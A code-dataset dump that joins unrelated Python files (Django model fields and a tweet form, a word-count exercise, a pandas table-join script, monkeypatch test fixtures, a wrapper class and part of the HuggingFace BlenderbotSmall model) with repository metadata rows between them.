        # unknown labels map to None (matches the old KeyError branch)
        return part_map.get(key)
class ReasonableBirthDate(DateField):
    """DateField that reads known placeholder dates back as None."""

    # the two dates the stored data uses as "unknown birthdate" markers
    _PLACEHOLDER_DATES = (date(1900, 1, 1), date(2018, 11, 13))

    def from_db_value(self, value, expression, connection):
        return None if value in self._PLACEHOLDER_DATES else value
class GenderField(CharField):
    """CharField mapping legacy gender labels onto canonical values on read."""

    def from_db_value(self, value, expression, connection):
        mapping = {
            'men': 'male',
            'women': 'female',
            'mixed': 'mixed',
        }
        try:
            normalized = value.lower()
        except AttributeError:
            # value is None or otherwise not a string
            return None
        # unknown labels map to None (matches the old KeyError branch)
        return mapping.get(normalized)
@deconstructible
class ImageUploadPath(object):
    """Build an image upload path of the form ``<app_label>/<model_name>/<name>/<pk>``."""

    def __init__(self, name):
        self.name = name

    def __call__(self, instance, filename):
        # the original filename is intentionally ignored
        meta = instance._meta
        parts = (meta.app_label, meta.model_name, self.name, str(instance.id))
        return os.path.join(*parts)
class NoPunctuationCharField(CharField):
    """CharField that strips punctuation and surrounding whitespace on read."""

    # every character removed from stored values (note: ' and - are kept)
    _PUNCTUATION = '!"#$%&()*+,./:;<=>?@[\\]^_`{|}~'

    def from_db_value(self, value, expression, connection):
        if not value:
            return ""
        table = value.maketrans('', '', self._PUNCTUATION)
        return value.translate(table).strip()
class TimezoneField(serializers.Field):
    # NOTE(review): exact duplicate of the TimezoneField defined earlier in
    # this module; one of the two definitions should be removed.
    def to_representation(self, obj):
        return six.text_type(obj)

    def to_internal_value(self, data):
        try:
            return pytz.timezone(str(data))
        except pytz.exceptions.UnknownTimeZoneError:
            raise ValidationError('Unknown timezone')
| [
"dbinetti@gmail.com"
] | dbinetti@gmail.com |
a737f00847838c5d50695751bc37fa22764d4575 | 835db5ec0fc127df1de58a9a3af4a869a1a7cd84 | /assignments/strings/word_count.py | fc5dd5e977ac303db00540d29a365b626279f30b | [] | no_license | thorhilduranna/2020-3-T-111-PROG | 3ba097e1b54d68bdd6efbf1d7f90911a9336fa5a | c9758b61256aa6e39a3308e576c8ad0bf2b6d027 | refs/heads/master | 2023-02-09T23:39:22.879653 | 2021-01-07T12:59:19 | 2021-01-07T12:59:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | a_str = input("Input a string: ")
inside_word = False
no_of_words = 0
no_of_letters = 0
for char in a_str:
if char.isalpha() or char.isdigit():
no_of_letters += 1
if not inside_word:
no_of_words += 1
inside_word = True
else:
inside_word = False
print("No. of letters {}, no. of words: {}".format(no_of_letters, no_of_words))
| [
"hrafnl@gmail.com"
] | hrafnl@gmail.com |
a2ce63face177225a9ae85576b4b6a7d69f8158e | 457a71c31c5bb992616bc2c8067817436c416784 | /src/teewtme/tweets/forms.py | 8dc47f94a55be3f0ebcf51740d42dfd2d3f6e57e | [] | no_license | mahmoudzeyada/tweetme | 9a7f15e9b1c3d0d4054637ac8ad5581a0a5ee825 | 00c046b96d40061e192990b9bae76998e8f46319 | refs/heads/master | 2020-04-10T04:17:13.130415 | 2019-04-29T01:17:28 | 2019-04-29T01:17:28 | 160,793,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | from django import forms
from .models import Tweet
from django.contrib.auth import get_user_model
class TweetModelForm(forms.ModelForm):
    """ModelForm for creating a Tweet; validates the ``content`` field."""

    content = forms.CharField(
        required=False,
        label="",
        widget=forms.Textarea(
            attrs={'placeholder': "your tweet",
                   "class": "form-control"}
        ),
    )

    class Meta:
        model = Tweet
        fields = ['content']

    def clean_content(self, *args, **kwargs):
        """Reject the banned word; otherwise return the cleaned content."""
        content = self.cleaned_data.get("content")
        if content == "bitch":
            # BUG FIX: django exposes forms.ValidationError; the original
            # `forms.ValidateError` does not exist and raised AttributeError
            raise forms.ValidationError("you r the fqin bitch")
        return content
| [
"mahmoudzeyada440@gmail.com"
] | mahmoudzeyada440@gmail.com |
bf533929e72d3e88457deb66a33be5a79bd0fc16 | bce3601042879a059bf878a9d7972967432fc154 | /scripts/DA_join_apps_rfcd_seos_2.py | 1c60d205c037784111dcff3a28881aad218f95e7 | [] | no_license | diegoami/DSRetreat_Melbourne_DIOLEM | 8aa49d0f178651af9f0c3ed23c0155790b205160 | 7e4df7a48f650360d3e34c700e17a84b1f7511b1 | refs/heads/master | 2021-07-08T08:55:56.580343 | 2017-10-06T23:02:07 | 2017-10-07T18:11:25 | 105,751,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | import pandas as pd
# Load the raw SEO / RFCD / application tables for the train and test splits.
seo_train = pd.read_csv('../data/train_seo_mod.csv')
rfcd_train = pd.read_csv('../data/train_rfcd_mod.csv')
app_train = pd.read_csv('../data/train_apps_mod.csv')
seo_test = pd.read_csv('../data/test_seo_mod.csv')
rfcd_test = pd.read_csv('../data/test_rfcd_mod.csv')
app_test = pd.read_csv('../data/test_apps_mod.csv')
def generate_table(seo, rfcd, app):
    """Pivot the SEO/RFCD percentage tables to wide form and join them onto `app`.

    Returns `app` (re-indexed by ``id``) with one ``RFCD_<code>`` /
    ``SEO_<code>`` percentage column per code, plus ``RFCD_OTHER`` /
    ``SEO_OTHER`` remainder columns summing each family to 100.
    """
    rfcd_pivoted = rfcd.pivot(index='id', columns='RFCD.Code', values='RFCD.Percentage').fillna(0)
    seo_pivoted = seo.pivot(index='id', columns='SEO.Code', values='SEO.Percentage').fillna(0)
    rfcd_pivoted.rename(columns=lambda x: "RFCD_" + str(x), inplace=True)
    seo_pivoted.rename(columns=lambda x: "SEO_" + str(x), inplace=True)
    # NOTE(review): `app` still carries its default RangeIndex here, so these
    # joins align the pivoted tables (indexed by `id`) against row position,
    # not against the `id` column -- correct only if `id` equals the row
    # number; verify against the input CSVs.
    app_rfcd = app.join(rfcd_pivoted, how='left').fillna(0)
    app_rfcd_seo = app_rfcd.join(seo_pivoted, how='left').fillna(0)
    # remainder not covered by any listed code, per family
    app_rfcd_seo['RFCD_OTHER'] = 100 - app_rfcd_seo[
        [x for x in app_rfcd_seo.columns if x.startswith('RFCD')]].sum(axis=1)
    app_rfcd_seo['SEO_OTHER'] = 100 - app_rfcd_seo[
        [x for x in app_rfcd_seo.columns if x.startswith('SEO')]].sum(axis=1)
    app_rfcd_seo.set_index('id', inplace=True)
    return app_rfcd_seo
# Build and persist the wide train/test feature tables.
app_rfcd_seo_train = generate_table(seo_train, rfcd_train, app_train)
app_rfcd_seo_train.to_csv('../data/train_apps_rfcd_seo_mod.csv')
app_rfcd_seo_test = generate_table(seo_test, rfcd_test, app_test)
app_rfcd_seo_test.to_csv('../data/test_apps_rfcd_seo_mod.csv')
| [
"diego.amicabile@gmail.com"
] | diego.amicabile@gmail.com |
59e4b2564ddea552ed9897307d3df7b9d25bb025 | dd3bbd4e7aaee7a8a5f26b927ce28ac472c855a5 | /eggs/collective.monkeypatcher-1.0.1-py2.7.egg/collective/monkeypatcher/tests/dummypatch.py | f9a09150452fd23fb7a4f27b88e58122d022afb5 | [] | no_license | nacho22martin/tesis | ea0a822f8bdbdef6f13f41276ecd4d6e85427ca5 | e137eb6225cc5e724bee74a892567796166134ac | refs/heads/master | 2020-12-24T13:20:58.334839 | 2013-11-09T12:42:41 | 2013-11-09T12:42:41 | 14,261,570 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 907 | py | # -*- coding: utf-8
# $Id: dummypatch.py 84132 2009-04-12 21:13:03Z glenfant $
"""Class, function and patch for test cases"""
class Dummy(object):
    """As said"""

    def someMethod(self):
        """someMethod docstring"""
        # patch target for the monkeypatcher test cases (see module header)
        return "original"
def patchedMethod(self):
    """patchedMethod docstring"""
    # module-level replacement for Dummy.someMethod in the test cases
    return "patched"
def someFunction(value):
    """someFunction docstring"""
    # identity function used as a patch target in the test cases
    return value
def patchedFunction(value):
    """patchedFunction docstring"""
    # replacement for someFunction; doubles the input so the patch is visible
    return value * 2
class Foo(object):
    """As said"""

    def someFooMethod(self):
        # patch target (no docstring in the original)
        return "fooMethod result"
def patchedFooMethod(self):
    # module-level replacement for Foo.someFooMethod in the test cases
    return "patchedFooMethod result"
def my_appy_patch(scope, original, replacement):
    """Custom patch applier: bind *replacement* as attribute *original* on *scope*."""
    setattr(scope, original, replacement)
# Collected monkey-patch events, appended by the fake handler below.
all_patches = []


def monkeyPatchHandler(event):
    """Fake handler"""
    all_patches.append(event)
| [
"ignacio@plone.(none)"
] | ignacio@plone.(none) |
cb81bed189406073d2dd70cd655ed560a290f09f | 1f886c4ba2bd9b440da96e67f1f07d11d1a7bebc | /jsoncomment/wrapper.py | 32af3ee60e114cdbef9e127b1061647892f4203c | [] | no_license | halfbrained/cuda_spell_checker | c9c56db7f9d0b61839e37da67dab1498cdbb1911 | bee0ac8a3481e92424488bcde0e7fd2020341819 | refs/heads/master | 2023-03-16T11:23:49.375473 | 2021-03-07T20:22:22 | 2021-03-07T20:22:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py |
################################################################################
from types import ModuleType
################################################################################
# A Class to simulate dynamic inheritance
# Allows to change behaviour of multiple modules or classes, with the same
# interface
# Note: Class wrapping only partially tested
class GenericWrapper:
    """Delegate unknown attribute lookups to a wrapped module or instance.

    Simulates dynamic inheritance: the same wrapper interface works whether
    the wrapped object is a module or a class instance.
    """

    def __init__(self, object_to_wrap):
        self.object_to_wrap = object_to_wrap
        if isinstance(object_to_wrap, ModuleType):
            # modules: resolve names in the module namespace
            self._lookup = self._module_lookup
        elif isinstance(object_to_wrap, object):
            # instances: defer to the instance's own __getattr__ hook
            self._lookup = self.object_to_wrap.__getattr__
        else:
            raise TypeError("Expected a Module or a Class Instance")

    def _module_lookup(self, name):
        return self.object_to_wrap.__dict__[name]

    def __getattr__(self, name):
        # only invoked for names not found on the wrapper itself
        return self._lookup(name)
| [
"support@uvviewsoft.com"
] | support@uvviewsoft.com |
dabb39f9ba1d0bfc87c5bf1f2da1b479cbee8b42 | c46754b9600a12df4f9d7a6320dfc19aa96b1e1d | /src/transformers/models/blenderbot_small/modeling_blenderbot_small.py | dc2f1512ffe6922f5639e767f70dc2d58c8daba1 | [
"Apache-2.0"
] | permissive | huggingface/transformers | ccd52a0d7c59e5f13205f32fd96f55743ebc8814 | 4fa0aff21ee083d0197a898cdf17ff476fae2ac3 | refs/heads/main | 2023-09-05T19:47:38.981127 | 2023-09-05T19:21:33 | 2023-09-05T19:21:33 | 155,220,641 | 102,193 | 22,284 | Apache-2.0 | 2023-09-14T20:44:49 | 2018-10-29T13:56:00 | Python | UTF-8 | Python | false | false | 76,130 | py | # coding=utf-8
# Copyright 2021 The Facebook, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch BlenderbotSmall model."""
import copy
import math
from typing import List, Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutput,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
Seq2SeqLMOutput,
Seq2SeqModelOutput,
)
from ...modeling_utils import PreTrainedModel
from ...utils import (
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_blenderbot_small import BlenderbotSmallConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "BlenderbotSmallConfig"
BLENDERBOT_SMALL_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/blenderbot_small-90M",
# See all BlenderbotSmall models at https://huggingface.co/models?filter=blenderbot_small
]
# Copied from transformers.models.bart.modeling_bart.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
    """
    Shift input ids one token to the right.
    """
    if pad_token_id is None:
        raise ValueError("self.model.config.pad_token_id has to be defined.")
    shifted = input_ids.new_zeros(input_ids.shape)
    shifted[:, 0] = decoder_start_token_id
    shifted[:, 1:] = input_ids[:, :-1].clone()
    # labels use -100 for ignored positions; map those back to the pad id
    shifted.masked_fill_(shifted == -100, pad_token_id)
    return shifted
# Copied from transformers.models.bart.modeling_bart._make_causal_mask
def _make_causal_mask(
input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0
):
"""
Make causal mask used for bi-directional self-attention.
"""
bsz, tgt_len = input_ids_shape
mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device)
mask_cond = torch.arange(mask.size(-1), device=device)
mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0)
mask = mask.to(dtype)
if past_key_values_length > 0:
mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1)
return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length)
# Copied from transformers.models.bart.modeling_bart._expand_mask
def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None):
"""
Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`.
"""
bsz, src_len = mask.size()
tgt_len = tgt_len if tgt_len is not None else src_len
expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype)
inverted_mask = 1.0 - expanded_mask
return inverted_mask.masked_fill(inverted_mask.to(torch.bool), torch.finfo(dtype).min)
# Copied from transformers.models.blenderbot.modeling_blenderbot.BlenderbotLearnedPositionalEmbedding with Blenderbot->BlenderbotSmall
class BlenderbotSmallLearnedPositionalEmbedding(nn.Embedding):
    """
    This module learns positional embeddings up to a fixed maximum size.
    """

    def __init__(self, num_embeddings: int, embedding_dim: int):
        super().__init__(num_embeddings, embedding_dim)

    def forward(self, input_ids_shape: torch.Size, past_key_values_length: int = 0):
        """`input_ids_shape` is expected to be [bsz x seqlen]."""
        seq_len = input_ids_shape[1]
        # positions continue from the cached length during incremental decoding
        start = past_key_values_length
        positions = torch.arange(start, start + seq_len, dtype=torch.long, device=self.weight.device)
        return super().forward(positions)
# Copied from transformers.models.bart.modeling_bart.BartAttention with Bart->BlenderbotSmall
class BlenderbotSmallAttention(nn.Module):
    """Multi-headed attention from 'Attention Is All You Need' paper"""

    def __init__(
        self,
        embed_dim: int,
        num_heads: int,
        dropout: float = 0.0,
        is_decoder: bool = False,
        bias: bool = True,
    ):
        super().__init__()
        self.embed_dim = embed_dim
        self.num_heads = num_heads
        self.dropout = dropout
        self.head_dim = embed_dim // num_heads

        if (self.head_dim * num_heads) != self.embed_dim:
            raise ValueError(
                f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}"
                f" and `num_heads`: {num_heads})."
            )
        # 1/sqrt(head_dim), applied to the query projection below
        self.scaling = self.head_dim**-0.5
        self.is_decoder = is_decoder

        self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
        self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)

    def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):
        # [bsz, seq, embed] -> [bsz, num_heads, seq, head_dim]
        return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous()

    def forward(
        self,
        hidden_states: torch.Tensor,
        key_value_states: Optional[torch.Tensor] = None,
        past_key_value: Optional[Tuple[torch.Tensor]] = None,
        attention_mask: Optional[torch.Tensor] = None,
        layer_head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:
        """Input shape: Batch x Time x Channel"""

        # if key_value_states are provided this layer is used as a cross-attention layer
        # for the decoder
        is_cross_attention = key_value_states is not None

        bsz, tgt_len, _ = hidden_states.size()

        # get query proj
        query_states = self.q_proj(hidden_states) * self.scaling
        # get key, value proj
        # `past_key_value[0].shape[2] == key_value_states.shape[1]`
        # is checking that the `sequence_length` of the `past_key_value` is the same as
        # the provided `key_value_states` to support prefix tuning
        if (
            is_cross_attention
            and past_key_value is not None
            and past_key_value[0].shape[2] == key_value_states.shape[1]
        ):
            # reuse k,v, cross_attentions
            key_states = past_key_value[0]
            value_states = past_key_value[1]
        elif is_cross_attention:
            # cross_attentions
            key_states = self._shape(self.k_proj(key_value_states), -1, bsz)
            value_states = self._shape(self.v_proj(key_value_states), -1, bsz)
        elif past_key_value is not None:
            # reuse k, v, self_attention
            key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
            value_states = self._shape(self.v_proj(hidden_states), -1, bsz)
            key_states = torch.cat([past_key_value[0], key_states], dim=2)
            value_states = torch.cat([past_key_value[1], value_states], dim=2)
        else:
            # self_attention
            key_states = self._shape(self.k_proj(hidden_states), -1, bsz)
            value_states = self._shape(self.v_proj(hidden_states), -1, bsz)

        if self.is_decoder:
            # if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
            # Further calls to cross_attention layer can then reuse all cross-attention
            # key/value_states (first "if" case)
            # if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
            # all previous decoder key/value_states. Further calls to uni-directional self-attention
            # can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
            # if encoder bi-directional self-attention `past_key_value` is always `None`
            past_key_value = (key_states, value_states)

        # flatten the batch and head dimensions for batched matmul
        proj_shape = (bsz * self.num_heads, -1, self.head_dim)
        query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape)
        key_states = key_states.reshape(*proj_shape)
        value_states = value_states.reshape(*proj_shape)

        src_len = key_states.size(1)
        attn_weights = torch.bmm(query_states, key_states.transpose(1, 2))

        if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len):
            raise ValueError(
                f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is"
                f" {attn_weights.size()}"
            )

        if attention_mask is not None:
            if attention_mask.size() != (bsz, 1, tgt_len, src_len):
                raise ValueError(
                    f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}"
                )
            # additive mask (large negative values at masked positions)
            attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask
            attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)

        attn_weights = nn.functional.softmax(attn_weights, dim=-1)

        if layer_head_mask is not None:
            if layer_head_mask.size() != (self.num_heads,):
                raise ValueError(
                    f"Head mask for a single layer should be of size {(self.num_heads,)}, but is"
                    f" {layer_head_mask.size()}"
                )
            attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
            attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)

        if output_attentions:
            # this operation is a bit awkward, but it's required to
            # make sure that attn_weights keeps its gradient.
            # In order to do so, attn_weights have to be reshaped
            # twice and have to be reused in the following
            attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
            attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len)
        else:
            attn_weights_reshaped = None

        attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training)

        attn_output = torch.bmm(attn_probs, value_states)

        if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim):
            raise ValueError(
                f"`attn_output` should be of size {(bsz * self.num_heads, tgt_len, self.head_dim)}, but is"
                f" {attn_output.size()}"
            )

        attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim)
        attn_output = attn_output.transpose(1, 2)

        # Use the `embed_dim` from the config (stored in the class) rather than `hidden_state` because `attn_output` can be
        # partitioned across GPUs when using tensor-parallelism.
        attn_output = attn_output.reshape(bsz, tgt_len, self.embed_dim)

        attn_output = self.out_proj(attn_output)

        return attn_output, attn_weights_reshaped, past_key_value
# Copied from transformers.models.bart.modeling_bart.BartEncoderLayer with Bart->BlenderbotSmall
class BlenderbotSmallEncoderLayer(nn.Module):
    """One Transformer encoder layer: self-attention followed by a feed-forward network,
    each sub-block wrapped in dropout, a residual connection and a post-LayerNorm."""

    def __init__(self, config: BlenderbotSmallConfig):
        super().__init__()
        self.embed_dim = config.d_model
        self.self_attn = BlenderbotSmallAttention(
            embed_dim=self.embed_dim,
            num_heads=config.encoder_attention_heads,
            dropout=config.attention_dropout,
        )
        self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        self.dropout = config.dropout
        self.activation_fn = ACT2FN[config.activation_function]
        self.activation_dropout = config.activation_dropout
        self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim)
        self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim)
        self.final_layer_norm = nn.LayerNorm(self.embed_dim)

    def forward(
        self,
        hidden_states: torch.FloatTensor,
        attention_mask: torch.FloatTensor,
        layer_head_mask: torch.FloatTensor,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[torch.FloatTensor, Optional[torch.FloatTensor]]:
        """
        Args:
            hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
            attention_mask (`torch.FloatTensor`): attention mask of size
                `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
            layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size
                `(encoder_attention_heads,)`.
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
        """
        # --- self-attention sub-block ---
        skip = hidden_states
        hidden_states, attn_weights, _ = self.self_attn(
            hidden_states=hidden_states,
            attention_mask=attention_mask,
            layer_head_mask=layer_head_mask,
            output_attentions=output_attentions,
        )
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = self.self_attn_layer_norm(skip + hidden_states)

        # --- feed-forward sub-block ---
        skip = hidden_states
        hidden_states = self.activation_fn(self.fc1(hidden_states))
        hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
        hidden_states = nn.functional.dropout(self.fc2(hidden_states), p=self.dropout, training=self.training)
        hidden_states = self.final_layer_norm(skip + hidden_states)

        # fp16 overflow guard: if the residual sums produced inf/nan, clamp to a finite range
        if hidden_states.dtype == torch.float16 and (
            torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any()
        ):
            bound = torch.finfo(hidden_states.dtype).max - 1000
            hidden_states = torch.clamp(hidden_states, min=-bound, max=bound)

        if output_attentions:
            return (hidden_states, attn_weights)
        return (hidden_states,)
# Copied from transformers.models.bart.modeling_bart.BartDecoderLayer with Bart->BlenderbotSmall
class BlenderbotSmallDecoderLayer(nn.Module):
    """One Transformer decoder layer: causal self-attention, cross-attention over the encoder
    output, and a feed-forward network; each sub-block is followed by dropout, a residual
    connection and a post-LayerNorm."""

    def __init__(self, config: BlenderbotSmallConfig):
        super().__init__()
        self.embed_dim = config.d_model
        # causal (uni-directional) self-attention over previously generated tokens
        self.self_attn = BlenderbotSmallAttention(
            embed_dim=self.embed_dim,
            num_heads=config.decoder_attention_heads,
            dropout=config.attention_dropout,
            is_decoder=True,
        )
        self.dropout = config.dropout
        self.activation_fn = ACT2FN[config.activation_function]
        self.activation_dropout = config.activation_dropout
        self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        # cross-attention: queries come from the decoder, keys/values from the encoder output
        self.encoder_attn = BlenderbotSmallAttention(
            self.embed_dim,
            config.decoder_attention_heads,
            dropout=config.attention_dropout,
            is_decoder=True,
        )
        self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim)
        self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim)
        self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim)
        self.final_layer_norm = nn.LayerNorm(self.embed_dim)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        encoder_hidden_states: Optional[torch.Tensor] = None,
        encoder_attention_mask: Optional[torch.Tensor] = None,
        layer_head_mask: Optional[torch.Tensor] = None,
        cross_attn_layer_head_mask: Optional[torch.Tensor] = None,
        past_key_value: Optional[Tuple[torch.Tensor]] = None,
        output_attentions: Optional[bool] = False,
        use_cache: Optional[bool] = True,
    ) -> Tuple[torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]]:
        """
        Args:
            hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
            attention_mask (`torch.FloatTensor`): attention mask of size
                `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
            encoder_hidden_states (`torch.FloatTensor`):
                cross attention input to the layer of shape `(batch, seq_len, embed_dim)`
            encoder_attention_mask (`torch.FloatTensor`): encoder attention mask of size
                `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
            layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size
                `(decoder_attention_heads,)`.
            cross_attn_layer_head_mask (`torch.FloatTensor`): mask for cross-attention heads in a given layer of
                size `(decoder_attention_heads,)`.
            past_key_value (`Tuple(torch.FloatTensor)`): cached past key and value projection states
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
        """
        residual = hidden_states
        # Self Attention
        # decoder uni-directional self-attention cached key/values tuple is at positions 1,2
        self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
        # add present self-attn cache to positions 1,2 of present_key_value tuple
        hidden_states, self_attn_weights, present_key_value = self.self_attn(
            hidden_states=hidden_states,
            past_key_value=self_attn_past_key_value,
            attention_mask=attention_mask,
            layer_head_mask=layer_head_mask,
            output_attentions=output_attentions,
        )
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = residual + hidden_states
        hidden_states = self.self_attn_layer_norm(hidden_states)
        # Cross-Attention Block
        cross_attn_present_key_value = None
        cross_attn_weights = None
        # cross-attention only runs when an encoder output is provided (skipped for decoder-only use)
        if encoder_hidden_states is not None:
            residual = hidden_states
            # cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
            cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
            hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
                hidden_states=hidden_states,
                key_value_states=encoder_hidden_states,
                attention_mask=encoder_attention_mask,
                layer_head_mask=cross_attn_layer_head_mask,
                past_key_value=cross_attn_past_key_value,
                output_attentions=output_attentions,
            )
            hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
            hidden_states = residual + hidden_states
            hidden_states = self.encoder_attn_layer_norm(hidden_states)
            # add cross-attn to positions 3,4 of present_key_value tuple
            present_key_value = present_key_value + cross_attn_present_key_value
        # Fully Connected
        residual = hidden_states
        hidden_states = self.activation_fn(self.fc1(hidden_states))
        hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training)
        hidden_states = self.fc2(hidden_states)
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        hidden_states = residual + hidden_states
        hidden_states = self.final_layer_norm(hidden_states)
        outputs = (hidden_states,)
        if output_attentions:
            outputs += (self_attn_weights, cross_attn_weights)
        if use_cache:
            # present_key_value is always the last element so callers can index it from the end
            outputs += (present_key_value,)
        return outputs
class BlenderbotSmallPreTrainedModel(PreTrainedModel):
    """Base class for BlenderbotSmall models: weight initialization, gradient-checkpointing
    plumbing, and dummy inputs for tracing/sanity checks."""

    config_class = BlenderbotSmallConfig
    base_model_prefix = "model"
    supports_gradient_checkpointing = True

    def _init_weights(self, module):
        """Initialize Linear/Embedding weights with N(0, config.init_std); zero biases and padding rows."""
        std = self.config.init_std
        if isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=std)
            if module.padding_idx is not None:
                # keep the padding embedding at zero so pad tokens contribute nothing
                module.weight.data[module.padding_idx].zero_()
        elif isinstance(module, nn.Linear):
            module.weight.data.normal_(mean=0.0, std=std)
            if module.bias is not None:
                module.bias.data.zero_()

    def _set_gradient_checkpointing(self, module, value=False):
        # only the encoder/decoder stacks carry a gradient_checkpointing flag
        if isinstance(module, (BlenderbotSmallDecoder, BlenderbotSmallEncoder)):
            module.gradient_checkpointing = value

    @property
    def dummy_inputs(self):
        """Return a small fixed batch (with one padded position) for tracing."""
        pad = self.config.pad_token_id
        ids = torch.tensor([[0, 6, 10, 4, 2], [0, 8, 12, 2, pad]], device=self.device)
        return {
            "attention_mask": ids.ne(pad),
            "input_ids": ids,
            "decoder_input_ids": ids,
        }
BLENDERBOT_SMALL_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`BlenderbotSmallConfig`]):
Model configuration class with all the parameters of the model. Initializing with a config file does not
load the weights associated with the model, only the configuration. Check out the
[`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
BLENDERBOT_SMALL_GENERATION_EXAMPLE = r"""
Conversation example:
```python
>>> from transformers import AutoTokenizer, BlenderbotSmallForConditionalGeneration
>>> mname = "facebook/blenderbot_small-90M"
